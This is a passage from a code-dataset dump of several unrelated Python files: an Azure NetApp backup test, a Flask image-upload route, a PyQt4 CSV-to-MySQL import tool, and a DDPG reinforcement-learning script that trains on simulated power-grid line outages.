create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, vnet=setup.PERMA_VNET, backup_name=backup1)\n\n account_backup = self.client.account_backups.get(setup.TEST_RG, setup.PERMA_ACCOUNT, backup1)\n assert account_backup.name == setup.PERMA_ACCOUNT + \"/\" + backup1\n finally:\n disable_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, backup_name=backup1)\n delete_volume(self.client, setup.TEST_RG, setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1)\n \n print(\"Finished with test_get_account_backups\")\n\n @recorded_by_proxy\n def test_delete_account_backups(self):\n print(\"Starting test_delete_account_backups\")\n set_bodiless_matcher()\n volumeName1 = self.get_resource_name(setup.TEST_VOL_1+\"-\")\n backup1 = self.get_resource_name(setup.TEST_BACKUP_1+\"-\")\n \n try:\n create_backup(self.client, account_name=setup.PERMA_ACCOUNT, pool_name=setup.PERMA_POOL, volume_name=volumeName1, vnet=setup.PERMA_VNET, backup_name=backup1)\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, setup.PERMA_ACCOUNT)\n assert len(list(account_backup_list)) >= 1\n finally:\n delete_volume(self.client, setup.TEST_RG, setup.PERMA_ACCOUNT, setup.PERMA_POOL, volumeName1)\n self.client.account_backups.begin_delete(setup.TEST_RG, setup.PERMA_ACCOUNT, backup1).wait()\n\n account_backup_list = self.client.account_backups.list(setup.TEST_RG, setup.PERMA_ACCOUNT)\n for backup in account_backup_list:\n assert backup.name != setup.PERMA_ACCOUNT + \"/\" + backup1\n\n print(\"Finished with test_delete_account_backups\")","sub_path":"sdk/netapp/azure-mgmt-netapp/tests/test_account_backup.py","file_name":"test_account_backup.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653518762","text":"import logging\nimport os\nimport time\n\nimport werkzeug.datastructures\nfrom flask import current_app as app\nfrom flask import session\nfrom flask_login import login_required\nfrom flask_restplus import Namespace\nfrom flask_restplus import Resource\n\nfrom app.extensions import api\nfrom app.services.aws.s3 import amazon_s3\n\nlog = logging.getLogger(__name__)\n\nns = Namespace('tools', path='/', description='Shared Tools API')\n\nfile_upload = ns.parser()\n\nfile_upload.add_argument(\n 'upload_type',\n type=str,\n required=True,\n help='upload type(invoice/id/evidence)',\n location='form',\n)\nfile_upload.add_argument(\n 'pic_file',\n type=werkzeug.datastructures.FileStorage,\n location='files',\n required=True,\n help='file',\n)\n\n\n@ns.route('/upload_file')\nclass FileUpload(Resource):\n \"\"\"Upload File.\"\"\"\n\n @login_required\n @api.doc(parser=file_upload)\n @api.expect(file_upload)\n def post(self):\n log.debug(session)\n user_id = session['user_id']\n args = file_upload.parse_args()\n if args['upload_type'] not in ['invoice', 'id', 'evidence']:\n return {'state': 'incorrect upload type'}, 401\n log.debug(args['pic_file'].mimetype)\n if args['pic_file'].mimetype and len(args['pic_file'].mimetype.split('/')) == 2:\n file_type, file_format = args['pic_file'].mimetype.split('/')\n if file_type.lower() != 'image' or file_format.lower() not in [\n 'jpeg',\n 'jpg',\n 'png',\n ]:\n return {'state': 'incorrect file type/format'}, 401\n folder = app.config.get(f\"{args['upload_type'].upper()}_FOLDER\")\n destination = os.path.join(\n app.config.get('WORKING_FOLDER'), user_id, folder + '/'\n )\n if not os.path.exists(destination):\n os.makedirs(destination)\n pic_file = '%s%s' % (destination, str(int(time.time())) + '.' + file_format)\n log.debug(pic_file)\n args['pic_file'].save(pic_file)\n pic_path = amazon_s3.upload_file(pic_file, folder)\n return {'state': 'Success', 'path': pic_path}, 200\n else:\n return {'state': 'failed uploading'}, 401\n","sub_path":"app/resources/tools/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"462857699","text":"import sys\nfrom PyQt4 import QtGui,QtCore,uic\nfrom PyQt4.QtCore import QVariant\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtCore import QVariant\nimport mysql.connector\nimport csv\nimport json\nimport itertools\nimport datetime\nfrom collections import OrderedDict\n\nclass connectDatabase():\n _instances = []\n _constarinTable= []\n dbHostName = \"\"\n dbLogin = \"\"\n dbPassowrd = \"\"\n dbDatabase =\"\"\n dbSchema= []\n endArray= []\n _dbData = []\n _insertSchemaArray = []\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(connectDatabase, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n def fillTAble(self):\n print(\"called fillTAble\")\n for row in connection._constarinTable:\n tmpArray=[]\n tmpArray.append(row[0])\n tmpArray.append(row[2])\n self.endArray.append(tmpArray)\n for row in enumerate(self.endArray):\n self.findID(row[1][0])\n self._instances=list(OrderedDict.fromkeys(self._instances))\n\n\n def createInsertString(self):\n print(\"called createInsertString\")\n print(self._dbData)\n print(self._instances)\n print(self._constarinTable)\n _tmpData = []\n\n insertArray = []\n insertArraySchema = []\n valueList=\"\"\n insertString=\"\"\n\n for x in self._instances:\n for y in self._constarinTable:\n if x is y[0]:\n insertArraySchema.append(y)\n\n for y in self._dbData:\n insertString2=\"\"\n for x in insertArraySchema:\n insertString=\"\"\n insertValues=\"\"\n for z in y:\n # print(z[0]+ \"== \"+x[1])\n if z[0] in x[1]:\n # print(\"weszlo\")\n insertValues = insertValues+z[0]+\"',\"\n insertString=insertString+z[1]+\"',\"\n\n insertValues=insertValues[0:-2]\n insertString=insertString[0:-2]\n insertString2 = \"INSERT INTO \"+x[0]+\" ('\"+insertValues+\"') VALUES ('\"+insertString+\"')\"\n insertArray.append(insertString2)\n self._insertSchemaArray = insertArray\n today = datetime.date.today()\n with open('insertData'+today.strftime('%d-%b-%Y')+'_insertString.txt', 'w') as outfile:\n json.dump(self._insertSchemaArray, outfile)\n # for x in insertArray:\n # print(x)\n\n\n def findID(self, id):\n print(\"called findID\")\n found=\"\"\n newArray = []\n for row in self.endArray:\n\n if row[0] is id:\n # newArray.append(row[0])\n self.findID(row[1])\n else:\n\n self._instances.append(id)\n self._instances=list(OrderedDict.fromkeys(self._instances))\n self.createInsertString()\n\n\n def filterTable(self):\n print(\"called filterTable\")\n newArray = []\n for row in enumerate(self.endArray):\n\n actualRow = row[1]\n isEmpty =0\n\n\n for row2 in self.endArray:\n\n if (row2[1] is not row[1]) and ( ):\n isEmpty =1\n else:\n isEmpty =0\n if isEmpty is 0:\n newArray.append(actualRow)\n else:\n newArray.insert(0,actualRow)\n # newArray.insert(0,actualRow) if isEmpty==1 else newArray.append(actualRow)\n self._insertSchemaArray = newArray\n\n\n\n def setDbConnection(self,_dbHostName=\"localhost\" , _dbLogin=\"newUser\" , _dbPassowrd=\"zaq\" , _dbDatabase=\"super-crm\"):\n print(\"called setDbConnection\")\n self.dbHostName = _dbHostName\n self.dbLogin = _dbLogin\n self.dbPassowrd = _dbPassowrd\n self.dbDatabase = _dbDatabase\n\n def getDbConnection(self):\n print(\"called getDbConnection\")\n print(self.dbHostName)\n print(self.dbLogin)\n print(self.dbPassowrd)\n print(self.dbDatabase)\n\n def getDataTables(self):\n print(\"called getDataTables\")\n print(\"login: \"+self.dbLogin)\n print(\"pass: \"+self.dbPassowrd)\n print(\"dbHostName: \"+self.dbHostName)\n print(\"dbDatabase: \"+self.dbDatabase)\n # config = {\n # 'user': self.dbLogin,\n # 'password': self.dbPassowrd,\n # 'host': self.dbHostName,\n # 'port': '3306',\n # 'database': self.dbDatabase}\n config = {\n 'user': \"newUser\",\n 'password': \"zaq\",\n 'host': \"localhost\",\n 'port': '3306',\n 'database': \"technologycupdb\"}\n\n db = mysql.connector.connect( **config)\n cursor = db.cursor()\n # cursor.execute(\"select * from information_schema.columns where table_schema = '\"+self.dbDatabase+\"' order by table_name,ordinal_position\")\n cursor.execute(\"select distinct table_name as selected_table,(SELECT GROUP_CONCAT(column_name) from information_schema.columns where table_schema = 'technologycupdb' and table_name=selected_table order by table_name,ordinal_position) from information_schema.columns where table_schema = 'technologycupdb' order by table_name,ordinal_position\")\n self.dbSchema = cursor.fetchall()\n cursor.execute(\"SELECT table_name, column_name, referenced_table_name FROM INFORMATION_SCHEMA.key_column_usage WHERE referenced_table_schema = 'technologycupdb' AND referenced_table_name IS NOT NULL ORDER BY table_name, column_name\")\n self._constarinTable = cursor.fetchall()\n\n\n\n def getTableName(self,name):\n for x in self.dbSchema:\n if name in x[1]:\n return x[0]\n\n\nclass dataAppliacation():\n print(\"called dataAppliacation\")\n dataArray = []\n dataColumnName = []\n def __init__(self):\n self.dataArray= [['00','01','02'],\n ['10','11','12'],\n ['20','21','22']]\n\n def getDataArray(self):\n return self.dataArray\n\n def setDataArray(self,newArray):\n\n self.dataArray=newArray\n\n def getColumnCount(self):\n return len(self.dataArray[0][0].split(\";\"))\n\n def getRownCount(self):\n return len(self.dataArray\n)\n\n\nclass connectionWindow(QtGui.QDialog):\n def __init__(self):\n super(connectionWindow , self).__init__()\n uic.loadUi('form2.ui', self)\n self.cancelButton.clicked.connect(self.close)\n self.connectButton.clicked.connect(self.setConnection)\n\n def setConnection(self):\n print(\"called setConnection\")\n dbHostName = self.dbHostText.text()\n dbLogin = self.dbLoginText.text()\n dbPassowrd = self.dbPasswordText.text()\n dbDatabase = self.dbNameText.text()\n connectDatabase.setDbConnection(connection,dbHostName, dbLogin, dbPassowrd, dbDatabase)\n connectDatabase.getDbConnection(connection)\n connectDatabase.getDataTables(connection)\n self.close()\n\n\nclass chooseTables(QtGui.QDialog):\n chosedValue=\"\"\n ID = \"\"\n currentColumn = \"\"\n currentRow = \"\"\n width = 0\n height = 0\n def __init__(self):\n super(chooseTables , self).__init__()\n uic.loadUi('form3.ui', self)\n self.cancelButton.clicked.connect(self.close)\n self.okButton.clicked.connect(self.chooseData)\n self.dbTables.cellClicked.connect(self.cell_was_clicked)\n self.fillData()\n\n\n def setCurrentCell(self,column=0, row=0):\n print(\"called setCurrentCell\")\n currentColumn = column\n currentRow = row\n\n def fillData(self):\n print(\"called fillData\")\n self.width = len(connection.dbSchema)\n\n self.maxLen=0\n for x in connection.dbSchema:\n if self.maxLenlistSize:\n listSize = len(newlist)\n\n\n self.form_widget.textEdit.setColumnCount(self.form_widget.textEdit.columnCount()+listSize)\n self.form_widget.tableDBChoose.setColumnCount(self.form_widget.tableDBChoose.columnCount()+listSize)\n for index in sorted(col):\n for item in range(0, self.form_widget.textEdit.rowCount()):\n print(str(item)+ \" \"+str(self.form_widget.textEdit.rowCount()))\n #print(self.textEdit.item(item, index.column()).text().encode('UTF8'))\n newlist = self.form_widget.textEdit.item(item, index.column()).text().split()\n #print(newlist.encode('UTF8'))\n self.form_widget.textEdit.item(item, index.column()).setBackground(QtGui.QColor(238,55,55))\n for splitListElement in enumerate(newlist):\n print(self.form_widget.textEdit.columnCount()+splitListElement[0])\n\n self.form_widget.textEdit.setItem(item,(startListCount+splitListElement[0]),QtGui.QTableWidgetItem(splitListElement[1]))\n #print(newlist)\n model = self.form_widget.textEdit.model()\n data = []\n for row in range(model.rowCount()):\n data.append([])\n for column in range(model.columnCount()):\n index = model.index(row, column)\n # We suppose data are strings\n data[row].append(str(model.data(index)))\n\n #print(data)\n self.dataAppliacations.setDataArray(data)\n for x in data:\n print(x.encode('UTF8'))\n\n def sendDataToDatabase(self):\n print(\"called sendDataToDatabase\")\n columnCount = self.form_widget.tableDBChoose.columnCount()\n rowCount = self.form_widget.textEdit.rowCount()\n print(str(columnCount)+\" \"+str(rowCount))\n insertString = \"\"\n insertArray = []\n topArray= []\n for x in range(0,columnCount):\n if self.form_widget.tableDBChoose.item(0, x) is not None:\n tableName=[]\n tableName.append(connection.getTableName(self.form_widget.tableDBChoose.item(0, x).text()))\n topArray.append(tableName)\n\n topArray.sort()\n topArray=list(topArray for topArray,_ in itertools.groupby(topArray))\n print(topArray)\n # for z in range(0,rowCount):\n # insertArray.append(topArray)\n print(columnCount)\n print(insertArray)\n for z in range(0,rowCount):\n insertArray.append([])\n for x in range(0,columnCount):\n if self.form_widget.tableDBChoose.item(0, x) is not None:\n tmpArray=[]\n tmpArray.append(self.form_widget.tableDBChoose.item(0, x).text())\n if self.form_widget.textEdit.item(z, x).type() is not None:\n tmpArray.append(self.form_widget.textEdit.item(z, x).text())\n\n curElement = connection.getTableName(self.form_widget.tableDBChoose.item(0, x).text())\n insertArray[z].append(tmpArray)\n print(insertArray)\n today = datetime.date.today()\n with open('insertData'+today.strftime('%d-%b-%Y')+'.txt', 'w') as outfile:\n json.dump(insertArray, outfile)\n connection._dbData = insertArray\n connection.fillTAble()\n\n def moveLeft(self):\n print(\"called moveLeft\")\n print(self.form_widget.textEdit.columnCount())\n col = self.form_widget.textEdit.selectedItems()\n for x in col:\n row= x.row()\n tmpArray=[]\n for y in range(x.column()+1,self.form_widget.textEdit.columnCount()):\n # print(self.form_widget.textEdit.tifeam(1,y))\n print(y)\n print(self.form_widget.textEdit.item(row,y-1).text())\n tmpArray.append(self.form_widget.textEdit.item(row,y-1).text())\n # self.form_widget.textEdit.setItem(x.row(),y-2,QtGui.QTableWidgetItem('a'))\n\n self.form_widget.textEdit.setItem(row,y-2,QtGui.QTableWidgetItem(self.form_widget.textEdit.item(row,y-1).text()))\n print('tutaj')\n print(tmpArray)\n\n\n def moveRight(self):\n print(\"called moveRight\")\n col = self.form_widget.textEdit.selectedItems()\n for x in col:\n for y in reversed(range(x.column(),self.form_widget.textEdit.columnCount())):\n # print(self.form_widget.textEdit.tifeam(1,y))\n if self.form_widget.textEdit.item(x.row(),y) !=None:\n print(str(self.form_widget.textEdit.columnCount())+ \" \"+ str(y))\n if y+1 == self.form_widget.textEdit.columnCount():\n print(\"powiekszono\")\n self.form_widget.textEdit.setColumnCount(self.form_widget.textEdit.columnCount()+1) \n itmBefore= self.form_widget.textEdit.item(x.row(),y).text()\n print(itmBefore)\n # self.form_widget.textEdit.setItem(1,5,QtGui.QTableWidgetItem(itmBefore))\n self.form_widget.textEdit.setItem(x.row(),y+1,QtGui.QTableWidgetItem(itmBefore))\n\n def initUI(self):\n\n openFile = QtGui.QAction(QtGui.QIcon('folder265.png'), 'Open', self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Open new File')\n openFile.triggered.connect(self.showDialog)\n\n exitAction = QtGui.QAction(QtGui.QIcon('cross108.png'), 'Exit', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.close)\n\n startApp = QtGui.QAction(QtGui.QIcon('arrow16.png'), 'Start', self)\n startApp.setStatusTip('Start application')\n startApp.triggered.connect(self.sendDataToDatabase)\n\n newConnection = QtGui.QAction(QtGui.QIcon('computers3.png'), 'New connection', self)\n newConnection.triggered.connect(self.connectionView)\n\n moveLeft = QtGui.QAction(QtGui.QIcon('left224.png'), 'move left', self)\n moveLeft.triggered.connect(self.moveLeft)\n\n moveRight = QtGui.QAction(QtGui.QIcon('right224.png'), 'move right', self)\n moveRight.triggered.connect(self.moveRight)\n\n self.statusBar()\n\n splitColumn = QtGui.QAction(QtGui.QIcon('split4.png'), 'Open', self)\n splitColumn.setShortcut('Ctrl+O')\n splitColumn.setStatusTip('Open new File')\n splitColumn.triggered.connect(self.splitData)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openFile)\n fileMenu.addAction(newConnection)\n fileMenu.addAction(startApp)\n fileMenu.addAction(exitAction)\n\n\n self.toolbar = self.addToolBar('Exit')\n self.toolbar.addAction(openFile)\n self.toolbar.addAction(newConnection)\n self.toolbar.addAction(splitColumn)\n self.toolbar.addAction(startApp)\n self.toolbar.addAction(exitAction)\n self.toolbar.addAction(moveLeft)\n self.toolbar.addAction(moveRight)\n\n self.setGeometry(300, 300, 650, 550)\n self.setWindowTitle('Main window')\n self.show()\n\n def connectionView(sefl):\n s = connectionWindow()\n s.exec_()\n\n def showDialog(self):\n\n fname = QtGui.QFileDialog.getOpenFileName(self, 'Open file',\n '/home')\n data = \"\"\n with open(fname, newline='') as csvfile:\n reader = csv.reader(csvfile)\n csvList = list(reader)\n self.dataAppliacations.setDataArray(csvList)\n print(self.dataAppliacations.dataArray)\n print(self.dataAppliacations.getColumnCount())\n self.form_widget.textEdit.setRowCount(self.dataAppliacations.getRownCount())\n self.form_widget.textEdit.setColumnCount(self.dataAppliacations.getColumnCount())\n self.form_widget.tableDBChoose.setColumnCount(self.dataAppliacations.getColumnCount())\n for rows in enumerate(self.dataAppliacations.getDataArray()):\n listOfElements=rows[1][0].split(\";\")\n counter= rows[0]\n for element in enumerate(listOfElements):\n print(element)\n self.form_widget.textEdit.setItem(counter,element[0],QtGui.QTableWidgetItem(element[1]))\n\n\n\nconnection = connectDatabase()\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = mainView()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"view/mainView.py","file_name":"mainView.py","file_ext":"py","file_size_in_byte":19106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"517723424","text":"import math\r\nimport random\r\nimport gym\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nfrom torch.distributions import Normal\r\nimport matplotlib.pyplot as plt\r\nfrom GridTest import Grid\r\nimport pandapower.networks as pn\r\nimport os\r\n\r\nuse_cuda = torch.cuda.is_available()\r\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n\r\ndef moving_average(signal,N=20):\r\n cumsum, moving_aves = [0], []\r\n\r\n for i, x in enumerate(signal, 1):\r\n cumsum.append(cumsum[i - 1] + x)\r\n if i >= N:\r\n moving_ave = (cumsum[i] - cumsum[i - N]) / N\r\n # can do stuff with moving_ave here\r\n moving_aves.append(moving_ave)\r\n\r\n return moving_ave\r\n\r\n\r\nclass ReplayBuffer:\r\n def __init__(self, capacity, limit=200, Ns=70, Na=9):\r\n self.capacity = capacity\r\n self.buffer = []\r\n # np.empty([limit, 2*Ns+Na+2])\r\n self.position = 0\r\n self.Ns= Ns\r\n self.Na = Na\r\n self.limit = limit\r\n\r\n def push(self, state, action, reward, next_state, done):\r\n # if len(self.buffer) < self.capacity:\r\n # self.buffer.append(None)\r\n # self.buffer[self.position] = (state, action, reward, next_state, done)\r\n # self.buffer[self.position]= np.concatenate([state, action, reward, next_state, done],axis=0)\r\n self.buffer.append(np.concatenate([state, action, reward, next_state, done], axis=0))\r\n # self.position = (self.position + 1) % self.capacity\r\n self.position = self.position + 1\r\n if self.position == self.limit:\r\n self.position = 0\r\n self.buffer=self.buffer[self.limit-41:]\r\n def sample(self, batch_size):\r\n half_batch = round(batch_size/2)\r\n data= np.array(self.buffer)\r\n ind = data[:,self.Ns+self.Na].argsort()\r\n data = data[ind[::-1]]\r\n batch=data[0:batch_size,:]\r\n batch2 = np.array(random.sample(list(data[half_batch:batch_size+1,:]), half_batch))\r\n # batch= np.concatenate([batch1,batch2],axis=0)\r\n\r\n state = batch[:, 0:self.Ns]\r\n action = batch[:, self.Ns:self.Ns+self.Na]\r\n reward = batch[:, self.Ns+self.Na:self.Ns+self.Na+1]\r\n next_state = batch[:, self.Ns+self.Na+1:self.Ns+self.Na+1+self.Ns]\r\n done = batch[:,self.Ns+self.Na+1+self.Ns]\r\n # state, action, reward, next_state, done = map(np.stack, zip(*batch))\r\n return state, action, reward, next_state, done\r\n\r\n def __len__(self):\r\n return len(self.buffer)\r\n\r\n\r\nclass NormalizedActions:\r\n def __init__(self,upp=1,low=-1):\r\n self.upp = upp\r\n self.low = low\r\n\r\n def _action(self, action):\r\n low_bound = self.low\r\n upper_bound = self.upp\r\n\r\n action = low_bound + (action + 1.0) * 0.5 * (upper_bound - low_bound)\r\n action = np.clip(action, low_bound, upper_bound)\r\n\r\n return action\r\n\r\n def _reverse_action(self, action):\r\n low_bound = self.low\r\n upper_bound = self.upp\r\n\r\n action = 2 * (action - low_bound) / (upper_bound - low_bound) - 1\r\n action = np.clip(action, low_bound, upper_bound)\r\n\r\n return action\r\n\r\n\r\nclass OUNoise(object):\r\n def __init__(self, action_space, mu=0.0, theta=0.15, max_sigma=0.3, min_sigma=0.3, decay_period=10):\r\n self.mu = mu\r\n self.theta = theta\r\n self.sigma = max_sigma\r\n self.max_sigma = max_sigma\r\n self.min_sigma = min_sigma\r\n self.decay_period = decay_period\r\n self.action_dim = action_space\r\n self.low = -1\r\n self.high = 1\r\n self.reset()\r\n\r\n def reset(self):\r\n self.state = np.ones(self.action_dim) * self.mu\r\n\r\n def evolve_state(self):\r\n x = self.state\r\n dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(self.action_dim)\r\n self.state = x + dx\r\n return self.state\r\n\r\n def get_action(self, action, t=0):\r\n ou_state = self.evolve_state()\r\n self.sigma = self.max_sigma - (self.max_sigma - self.min_sigma) * min(1.0, t / self.decay_period)\r\n return np.clip(action + ou_state, self.low, self.high)\r\n\r\n\r\nclass ValueNetwork(nn.Module):\r\n def __init__(self, num_inputs, num_actions, hidden_size1=128,hidden_size2=256,hidden_size3=512,hidden_size4=32, init_w=3e-3):\r\n super(ValueNetwork, self).__init__()\r\n\r\n self.linear_act = nn.Linear(num_actions, hidden_size1)\r\n self.linear_var = nn.Linear(num_inputs , hidden_size1)\r\n # self.linear1 = nn.Linear(num_inputs + num_actions, hidden_size)\r\n self.normalized = nn.BatchNorm1d(hidden_size1,affine=False)\r\n self.linear1 = nn.Linear(hidden_size1, hidden_size2)\r\n self.linear2 = nn.Linear(hidden_size2, hidden_size3)\r\n self.linear3 = nn.Linear(hidden_size3, hidden_size4)\r\n self.linear4 = nn.Linear(hidden_size4, 1)\r\n\r\n self.linear1.weight.data.uniform_(-init_w, init_w)\r\n self.linear1.bias.data.uniform_(-init_w, init_w)\r\n self.linear2.weight.data.uniform_(-init_w, init_w)\r\n self.linear2.bias.data.uniform_(-init_w, init_w)\r\n self.linear3.weight.data.uniform_(-init_w, init_w)\r\n self.linear3.bias.data.uniform_(-init_w, init_w)\r\n self.linear4.weight.data.uniform_(-init_w, init_w)\r\n self.linear4.bias.data.uniform_(-init_w, init_w)\r\n\r\n def forward(self, state, action):\r\n # x = torch.cat([state, action], 1)\r\n\r\n x = F.relu(self.linear_act(action)+self.linear_var(state))\r\n x = self.normalized(x)\r\n x = F.relu(self.linear1(x))\r\n x = F.relu(self.linear2(x))\r\n x = F.relu(self.linear3(x))\r\n x = self.linear4(x)\r\n return x\r\n\r\n\r\nclass PolicyNetwork(nn.Module):\r\n def __init__(self, num_inputs, num_actions, hidden_size, init_w=3e-3):\r\n super(PolicyNetwork, self).__init__()\r\n\r\n self.linear1 = nn.Linear(num_inputs, hidden_size)\r\n self.linear2 = nn.Linear(hidden_size, hidden_size)\r\n self.linear3 = nn.Linear(hidden_size, num_actions)\r\n\r\n self.linear3.weight.data.uniform_(-init_w, init_w)\r\n self.linear3.bias.data.uniform_(-init_w, init_w)\r\n\r\n def forward(self, state):\r\n x = F.relu(self.linear1(state))\r\n x = F.relu(self.linear2(x))\r\n x = torch.tanh(self.linear3(x))\r\n return x\r\n\r\n def get_action(self, state):\r\n state = torch.FloatTensor(state).unsqueeze(0).to(device)\r\n action = self.forward(state)\r\n return action.detach().cpu().numpy()[0, 0]\r\n\r\n\r\ndef ddpg_update(batch_size,value_net,policy_net,target_value_net,target_policy_net,\r\n policy_optimizer,value_optimizer,\r\n replay_buffer,\r\n gamma=0.99,\r\n min_value=-np.inf,\r\n max_value=np.inf,\r\n soft_tau=1e-2):\r\n state, action, reward, next_state, done = replay_buffer.sample(batch_size)\r\n\r\n state = torch.FloatTensor(state).to(device)\r\n next_state = torch.FloatTensor(next_state).to(device)\r\n action = torch.FloatTensor(action).to(device)\r\n reward = torch.FloatTensor(reward).to(device)\r\n done = torch.FloatTensor(done).unsqueeze(1).to(device)\r\n\r\n policy_loss = value_net(state, policy_net(state))\r\n policy_loss = -policy_loss.mean()\r\n\r\n next_action = target_policy_net(next_state)\r\n target_value = target_value_net(next_state, next_action.detach())\r\n expected_value = reward + (1.0 - done) * gamma * target_value\r\n expected_value = torch.clamp(expected_value, min_value, max_value)\r\n # ss = torch.reshape(state, [-1, 70])\r\n value = value_net(state, action)\r\n\r\n criterion=nn.MSELoss()\r\n value_loss = criterion(value, expected_value.detach())\r\n\r\n policy_optimizer.zero_grad()\r\n policy_loss.backward()\r\n policy_optimizer.step()\r\n\r\n value_optimizer.zero_grad()\r\n value_loss.backward()\r\n value_optimizer.step()\r\n\r\n for target_param, param in zip(target_value_net.parameters(), value_net.parameters()):\r\n target_param.data.copy_(\r\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\r\n )\r\n\r\n for target_param, param in zip(target_policy_net.parameters(), policy_net.parameters()):\r\n target_param.data.copy_(\r\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\r\n )\r\n return value_net,policy_net,target_value_net,target_policy_net,policy_optimizer,value_optimizer,value_loss,policy_loss\r\n\r\n\r\n\r\nenv = Grid(pn.case5())\r\nNs=env.StateFeatures()[0]*env.StateFeatures()[1]\r\nstate_dim = Ns\r\naction_dim = env.ActionFeature()\r\nou_noise = OUNoise(action_dim)\r\n\r\nhidden_dim = 256\r\n\r\nvalue_net = ValueNetwork(state_dim, action_dim, hidden_dim).to(device)\r\npolicy_net = PolicyNetwork(state_dim, action_dim, hidden_dim).to(device)\r\n\r\n\r\nbest_value_net = ValueNetwork(state_dim, action_dim, hidden_dim).to(device)\r\nbest_policy_net = PolicyNetwork(state_dim, action_dim, hidden_dim).to(device)\r\npath = '/model'\r\n\r\ntarget_value_net = ValueNetwork(state_dim, action_dim, hidden_dim).to(device)\r\ntarget_policy_net = PolicyNetwork(state_dim, action_dim, hidden_dim).to(device)\r\n\r\nfor target_param, param in zip(target_value_net.parameters(), value_net.parameters()):\r\n target_param.data.copy_(param.data)\r\n\r\nfor target_param, param in zip(target_policy_net.parameters(), policy_net.parameters()):\r\n target_param.data.copy_(param.data)\r\n\r\nvalue_lr = 1e-3\r\npolicy_lr = 1e-4\r\n\r\nvalue_optimizer = optim.Adam(value_net.parameters(), lr=value_lr)\r\npolicy_optimizer = optim.Adam(policy_net.parameters(), lr=policy_lr)\r\n\r\n\r\n\r\nreplay_buffer_size = 1000000\r\nreplay_buffer = ReplayBuffer(replay_buffer_size)\r\n\r\nmax_frames = 24000\r\nmax_steps = 20\r\nframe_idx = 0\r\nrewards = []\r\nbatch_size = 40\r\nreward_com=[]\r\n\r\nbest_reward_per_ep = 0\r\n\r\nvalue_net_loss=[]\r\npolicy_net_loss=[]\r\n\r\nif len(os.getcwd()+'/model_new') !=0:\r\n value_net = torch.load(os.getcwd()+'/model_new/best_value_net')\r\n policy_net = torch.load(os.getcwd()+'/model/best_policy_net')\r\n target_value_net = torch.load(os.getcwd()+'/model/best_value_net')\r\n target_policy_net = torch.load(os.getcwd()+'/model/best_policy_net')\r\n best_value_net = torch.load(os.getcwd()+'/model/best_value_net')\r\n best_policy_net = torch.load(os.getcwd()+'/model/best_policy_net')\r\n value_net.eval()\r\n policy_net.eval()\r\n target_value_net.eval()\r\n target_policy_net.eval()\r\n best_value_net.eval()\r\n best_policy_net.eval()\r\n\r\n\r\nwhile frame_idx < max_frames:\r\n env.reset()\r\n # state = env.InitState().reshape([-1, Ns])\r\n state = env.InitState().reshape(Ns)\r\n ind = np.random.choice(np.arange(env.net.line.shape[0]))\r\n env.Attack(ind)\r\n ou_noise.reset()\r\n episode_reward = 0\r\n\r\n for step in range(max_steps):\r\n action = policy_net.get_action(state)\r\n action = ou_noise.get_action(action, step)\r\n next_state, reward, done,reward_comps = env.take_action(action)\r\n reward_com.append(reward_comps)\r\n next_state = next_state.reshape(Ns)\r\n reward = np.array(reward).reshape(1)\r\n done = np.array(done).reshape(1)\r\n # next_state= next_state.reshape([-1,Ns])\r\n\r\n # action= np.array(action).reshape([-1,action_dim])\r\n replay_buffer.push(state, action, reward, next_state, done)\r\n\r\n if replay_buffer.position % batch_size == 0:\r\n value_net, policy_net, target_value_net, target_policy_net,policy_optimizer, value_optimizer,v_loss,p_loss= \\\r\n ddpg_update(batch_size,value_net,policy_net,target_value_net,target_policy_net,\r\n policy_optimizer,value_optimizer,replay_buffer)\r\n value_net_loss.append(float(v_loss.item()))\r\n policy_net_loss.append(float(p_loss.item()))\r\n # ddpg_update(batch_size, value_net, policy_net, target_value_net, target_policy_net,\r\n # policy_optimizer, value_optimizer, replay_buffer)\r\n state = next_state\r\n episode_reward += reward\r\n\r\n if done[0]==1:\r\n if episode_reward > best_reward_per_ep:\r\n best_reward_per_ep = episode_reward\r\n for best_param, param in zip(best_value_net.parameters(), value_net.parameters()):\r\n best_param.data.copy_(param.data)\r\n\r\n for best_param, param in zip(best_policy_net.parameters(), policy_net.parameters()):\r\n best_param.data.copy_(param.data)\r\n\r\n torch.save(best_value_net, os.getcwd()+'/model_new/best_value_net')\r\n torch.save(best_policy_net, os.getcwd()+'/model_new/best_policy_net')\r\n\r\n print('In Episode {}, step {}, we reached to terminal with total episode reward function : {} '\r\n 'and best reward is : {}'.\r\n format(frame_idx, step,episode_reward,best_reward_per_ep))\r\n break\r\n\r\n frame_idx += 1\r\n if frame_idx % 100 == 0:\r\n np.save('reward', rewards)\r\n np.save('reward_com', reward_com)\r\n print('In Episode: {}, the reward function is {}'.format(frame_idx, episode_reward))\r\n\r\n rewards.append(episode_reward)\r\n\r\n\r\na= 